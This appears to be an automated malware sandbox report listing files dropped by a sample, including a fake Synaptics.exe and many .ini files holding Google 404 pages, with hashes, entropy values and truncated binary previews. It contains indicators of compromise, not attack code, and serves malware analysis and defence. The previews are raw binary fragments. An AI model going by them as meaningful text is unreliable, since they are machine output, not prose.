                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                        C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\blq.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        C:\Users\user\AppData\Local\Temp\4sprR6G.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.283877430783821
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0xDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ED+pAZewRDK4mW
                                                                                        MD5:FAFF403D597B97667998FCAC9CDC445B
                                                                                        SHA1:D67B7546E229C6CE0EEB866DBBDB57A2C2BB7B97
                                                                                        SHA-256:288F45734A783CE02A6832C0BAB79D5DB6A463E3D2CA0A0EC97A54BCFC5568A5
                                                                                        SHA-512:C5C29BA23617A343B89C6C0F70F46150A5AF727ED86AF6DF6D36430B5EE9F3993769373E1B3B82174EB3EB1E239E0AD122FA5E8DA5C1C5D5B762F75C48497992
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P9BHZZe6CJMSwSTXxRH9Yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\7qdwX8o.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2659183034924855
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
                                                                                        MD5:17578FC0D8C63717FB78181AE07710B4
                                                                                        SHA1:79BB49E973D66BB7F710F13422263A3AEE61C349
                                                                                        SHA-256:C08F7AABEDD1CAAFFBFD9D78DFE0D06CCA76E1DAA37A687A25CEB31D0F1FC426
                                                                                        SHA-512:A7E61B66A2CEBF929B0C4A7A4AC5155F6D97C4E97E7E262CF3657D6798D9730A861341DC0A0997E372FF38D01512F6DDFF2EFB535E5933A9989CBC154E88BDF5
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HW4_chZ11noISJIwsYHKZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\FytxXuX.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.261928432599524
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0koSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9o+pAZewRDK4mW
                                                                                        MD5:929F7AC09B2A6EC315C7BCD7F60F78D9
                                                                                        SHA1:D912E9373FFD09AC391ACA21D9C59D17CF182EE3
                                                                                        SHA-256:8A28D9FDDA5213C401F6FE35985B0968146CE68636AEA1CDB859C42CF4732C2C
                                                                                        SHA-512:FFD2F3D8CF1D53A3DC310F969800A649A642AFFFEB8325A838868EA0CDA0EDB919465D97D8C47481BBE8CC6ADD5CB09E670150DFF5022AA1B8D53335ACC14531
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MGgmE5xShd-ZXq3w06GE6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\HzLYlHR.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.260955084859783
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0VaSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                        MD5:07A5511F7DCC8751562558FD41B3CD16
                                                                                        SHA1:CD37F1C14B19FB328E82DB572F1AEC9F045CF94B
                                                                                        SHA-256:5675270B5CF1FBCA5129B834D460EE5C47C1778F96F06A488F0DE81F296828EC
                                                                                        SHA-512:2A52D102336E0A917F6453E3D3777ACA1D0D2BD5AF0935DCE9BB68415C3F1A2193686F733CCBA814724EA6356274807D75FE37F3DD996A99041EEFF29A95E5A9
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fKmdcpzML-xbVUgAlSYVhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\IvDYBcX.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2639761184554335
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0d4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u4+pAZewRDK4mW
                                                                                        MD5:8EB27726E79A8D89F4F90E59F4F83661
                                                                                        SHA1:CFEA871475B11C2E8C4E883E12D4D3F80EAE82CC
                                                                                        SHA-256:40134F1EA1E95BCBEB141484F1155E174030F4D258BF1E686A854A38F48B44BB
                                                                                        SHA-512:BF98ED2BD5AA9644787ACEAC21199CB9D71F08A7FF00E507C47A8E6733C0144D75924F95B7A3DA0F89B67FFCD2767B870D4BA9CA71EB4F842E97D4C6D4C1D3D5
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LhqJXTE8yB8Nn_Kln_sb1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\LbmeIli.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.259281723941837
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0PlnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8V+pAZewRDK4mW
                                                                                        MD5:6F6471A16ABC175E0C200EDFA9E529E2
                                                                                        SHA1:491604A20C4DDACE944916186DB464F5823E27FB
                                                                                        SHA-256:2292242EFF674AE0A612E34B303F2BF1B947221649992F9B38E7E2C02990A114
                                                                                        SHA-512:787BD2A2AAE7764033E57A0B7E68A20A9EFACE62E3F340F8B8D76B3071420F8059AA7C202A095800E6254B1D37D02598FEF44D77D996F9633F060AB90DFE219E
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u5vhlcq2PORzRLDJehpefQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\MhY4MOf.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.261591737544051
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0lprXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                        MD5:7ADBED4F6EEA5DE16D947AF95521D9D7
                                                                                        SHA1:A2EF58A4B2E87713859814A27CED8ABBBFB0D498
                                                                                        SHA-256:CA39AF9ED4842EE9BDE514E72FB64AEC72755DE57991A6E348A9E8A243933186
                                                                                        SHA-512:CB077CFAB5A089B6FD23CA097747E2B58911929DA59FFAC678A36762C7207FB2B9A8DC174CD969A7ABF227CAD20BBA54B49D1B4E82B6875BD6E22C3DEE8C8353
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AT2IMeAZ-X-V7lgducL3Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\NsglWfU.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.268872826931782
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0AReISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                        MD5:868F02E319EF900410126266CC325B25
                                                                                        SHA1:B57A454E73AE8F9C7C5384B42BB91AB226BA0734
                                                                                        SHA-256:494791B5D4D5DB33C5465C08D7C36BC4A705F8396834B929FE74E264F141D2A1
                                                                                        SHA-512:301985A281775E375273D089D2B0201774A4C20DA4C3ABFBD14556DF8B4BA012E3FF9E559F8260FDAE0584FA41AEDC8613A542F475C5A8FC07AD69C0FCF3D2D2
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qJhlihVXreZgS63DW9BbxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\OslfsL4J.xlsm

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:Microsoft Excel 2007+
                                                                                        Category:dropped
                                                                                        Size (bytes):18387
                                                                                        Entropy (8bit):7.523057953697544
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                        Malicious:false
                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                        C:\Users\user\AppData\Local\Temp\Prnfulx.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.261183386677134
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+08mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                        MD5:717C4E5DFA701096EB8AC5A0EC650918
                                                                                        SHA1:5CBE8567D5AC7301636DD727FF7F53307FF59CDE
                                                                                        SHA-256:B17E26FF91D3C0AAC573CF0459804F1C644D7AD761DE08C0D6595E663C371F7F
                                                                                        SHA-512:DA44D5FC39BFF5B451BBCE73EE702F6345A9C56FE9A4A0BBD309C1F4B8BD058B0F2AA6D3001D4A583710CC4226734C433A86639E2B8F2C939DDBC53069B3FA18
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1FaLzPAMv4R6sXtnwRazLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\TeeakSA.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.267631760132345
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0pISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+KI+pAZewRDK4mW
                                                                                        MD5:98D82988103FAC4CDC30DCCEC4A7A851
                                                                                        SHA1:9E5109F82F7F5C197CF69690ED23F8CAAC12CC6A
                                                                                        SHA-256:32A8EA12144A7580C2E473BFFD7026BB7BE9628C02ED1EBC27B4B63B59F6210C
                                                                                        SHA-512:9ED36176FEC253CA5411831FC76404055EA1D1932AD13D691274F8C6B1AEFF645FC79F5B7BAA6FB893BFE110BE973BE8E4B3BA3096EE799EFF16A3D72FDBDEF0
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LI2BNjuG-9gKjWjk524IIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\VMfG2F7.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2666031443331125
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                        MD5:B27750C1E82375F0AFEA1D42ED32E58C
                                                                                        SHA1:3540919D4FAA33844150243112F9C1798A3E12A6
                                                                                        SHA-256:C8BC64BB67342F7E0CAAED990A0ED41717152BDD7ACA13B3F7AED1B4AED960FD
                                                                                        SHA-512:4D0E44787950DAF2151AC2CBC0192A648DAAE5C4564EB7290426D91FBCBA8F3DF87624A144CB6F03C2DCA67126859DC50F7A354EB7C7E578AC2522D658305C77
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WYm5UgfrzPWSi6zKijoiHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\VRoQzIo.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.267266216002257
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0kSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                        MD5:74475920D7DCEA2A879D98D1F79EB754
                                                                                        SHA1:20EB67F5B3AB25731A302BD59E9571C33C32B0F5
                                                                                        SHA-256:3B68352C2E722946399AEC94E5279177E8C6E59523C21B1D40F1AC74056BBA6E
                                                                                        SHA-512:13F2BC375D0BBA2F2A88B64B28DEFAED816CD13D1346FD194669AB01E295A451BA70E5E42BDE2E8558D4F48543BE9885DA6C28572FD5AEBE7C76DFD7898FA115
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oWqT0vJsPLp69tFYOTeWeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\aBTcqSi.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.267743549317712
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                        MD5:9404DAA31D15CBE631B1BB0C30C7C146
                                                                                        SHA1:EEFD8E3B7F7568C8DC82CC701C066052B771A579
                                                                                        SHA-256:225F95A5788191BB836F655FDDA2C4DD82AB8E860E22AD174AB093AC930DF8CC
                                                                                        SHA-512:1740BC110D22EC1EAD9A798C56DAD294FAF7DA81A7C452F939C20E18CF6A90EAB3A007395E033136BDD922DE9CF372D870FF0C5CA6B325067F650B7AAAAC8F58
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hdvkvtSO82DIEdjqJfIb6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\azzCgTw.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.26845675164094
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0NA4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L4+pAZewRDK4mW
                                                                                        MD5:53D41410CD451EE513C7BE9FB49C0C73
                                                                                        SHA1:40004412F6012066FAE2BD20E3931BCCD95A2779
                                                                                        SHA-256:4F9FEAC77A41C4AE7BFB39ABA57AC25ED33809EFE04F34F071133CC553011DC6
                                                                                        SHA-512:5B2195C12554D2EA4F83476C4CBA98785A70CD4DA28B4FC7040EBCDDFAE720B57FA061EED0AA5750CF603367AB30990DE3127A3A14C94E58895D36F195A58A17
                                                                                        Malicious:false
